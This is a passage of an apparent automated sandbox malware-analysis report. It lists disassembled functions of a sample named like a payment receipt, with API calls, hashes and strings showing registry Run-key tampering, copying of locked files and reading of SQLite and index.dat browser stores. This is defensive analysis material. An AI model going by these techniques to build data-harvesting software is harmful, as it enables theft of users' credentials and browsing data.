                                                    • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                    • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                    Strings
                                                    • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: DeleteOpenValue
                                                    • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                    • API String ID: 2654517830-1051519024
                                                    • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                    • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                    • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                    • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                    Function 0043FA6E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FB04
                                                    • GetLastError.KERNEL32 ref: 0043FB12
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB6D
                                                    Memory Dump Source
                                                    • Source File: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_12_2_400000_eaJOpx.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$ErrorLast
                                                    • String ID:
                                                    • API String ID: 1717984340-0
                                                    • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                    • Instruction ID: 94dc36b571f96c0084dd62d2177e44ea0606df48237064e9d41db09688609199
                                                    • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                    • Instruction Fuzzy Hash: 66413870E00206AFCF219F64C854A6BF7A9EF09320F1451BBF8585B2A1E738AC09C759

                                                    Executed Functions

                                                    Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 504 4091b8-40921b memset call 40a6e6 call 444432 509 409520-409526 504->509 510 409221-40923b call 40b273 call 438552 504->510 514 409240-409248 510->514 515 409383-4093ab call 40b273 call 438552 514->515 516 40924e-409258 call 4251c4 514->516 528 4093b1 515->528 529 4094ff-40950b call 443d90 515->529 521 40937b-40937e call 424f26 516->521 522 40925e-409291 call 4253cf * 2 call 4253af * 2 516->522 521->515 522->521 552 409297-409299 522->552 532 4093d3-4093dd call 4251c4 528->532 529->509 538 40950d-409511 529->538 539 4093b3-4093cc call 4253cf * 2 532->539 540 4093df 532->540 538->509 542 409513-40951d call 408f2f 538->542 539->532 555 4093ce-4093d1 539->555 543 4094f7-4094fa call 424f26 540->543 542->509 543->529 552->521 554 40929f-4092a3 552->554 554->521 556 4092a9-4092ba 554->556 555->532 557 4093e4-4093fb call 4253af * 2 555->557 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->543 569 409401-409403 557->569 558->559 560 409333-409345 memcmp 559->560 561 4092e5-4092ec 559->561 560->521 564 409347-40935f memcpy 560->564 561->521 563 4092f2-409331 memcpy * 2 561->563 566 409363-409378 memcpy 563->566 564->566 566->521 569->543 570 409409-40941b memcmp 569->570 570->543 571 409421-409433 memcmp 570->571 572 4094a4-4094b6 memcmp 571->572 573 409435-40943c 571->573 572->543 575 4094b8-4094ed memcpy * 2 572->575 573->543 574 409442-4094a2 memcpy * 3 573->574 576 4094f4 574->576 575->576 576->543
                                                    APIs
                                                    • memset.MSVCRT ref: 004091E2
                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                    • String ID:
                                                    • API String ID: 3715365532-3916222277
                                                    • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                    • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                    Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                    • String ID: bhv
                                                    • API String ID: 4234240956-2689659898
                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                    Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 704 40e175-40e1a1 call 40695d call 406b90 709 40e1a7-40e1e5 memset 704->709 710 40e299-40e2a8 call 4069a3 704->710 712 40e1e8-40e1fa call 406e8f 709->712 716 40e270-40e27d call 406b53 712->716 717 40e1fc-40e219 call 40dd50 * 2 712->717 716->712 722 40e283-40e286 716->722 717->716 728 40e21b-40e21d 717->728 725 40e291-40e294 call 40aa04 722->725 726 40e288-40e290 free 722->726 725->710 726->725 728->716 729 40e21f-40e235 call 40742e 728->729 729->716 732 40e237-40e242 call 40aae3 729->732 732->716 735 40e244-40e26b _snwprintf call 40a8d0 732->735 735->716
                                                    APIs
                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • memset.MSVCRT ref: 0040E1BD
                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                    • free.MSVCRT ref: 0040E28B
                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                    • API String ID: 2804212203-2982631422
                                                    • Opcode ID: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                    • Opcode Fuzzy Hash: 3097c73213ec0a6a1db6d887d8be9a96c969786007a4d3e1c3bc36e7f6b4a6bd
                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                    Function 0041F1A5 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                    • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                    • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: memcmp
                                                    • String ID: @ $SQLite format 3
                                                    • API String ID: 1475443563-3708268960
                                                    • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                    • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                    Function 004110DC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: _wcsicmpqsort
                                                    • String ID: /nosort$/sort
                                                    • API String ID: 1579243037-1578091866
                                                    • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                    • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                    Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,00402E6F), ref: 0040D0CC
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,00402E6F), ref: 0040D0EA
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D108
                                                    • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,00402E6F), ref: 0040D126
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ??2@
                                                    • String ID:
                                                    • API String ID: 1033339047-0
                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                    Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: FileFindFirst
                                                    • String ID: *.*$index.dat
                                                    • API String ID: 1974802433-2863569691
                                                    • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                    • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                    Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                    • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: File$CloseCreateHandleTime
                                                    • String ID:
                                                    • API String ID: 3397143404-0
                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                    Function 0040B1AB Relevance: 2.5, APIs: 2, Instructions: 14COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: free
                                                    • String ID:
                                                    • API String ID: 1294909896-0
                                                    • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                    • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                    • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                    • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                    Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.4053968199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_15_2_400000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID: ??3@
                                                    • String ID:
                                                    • API String ID: 613200358-0
                                                    • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                    • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                    • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                    • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518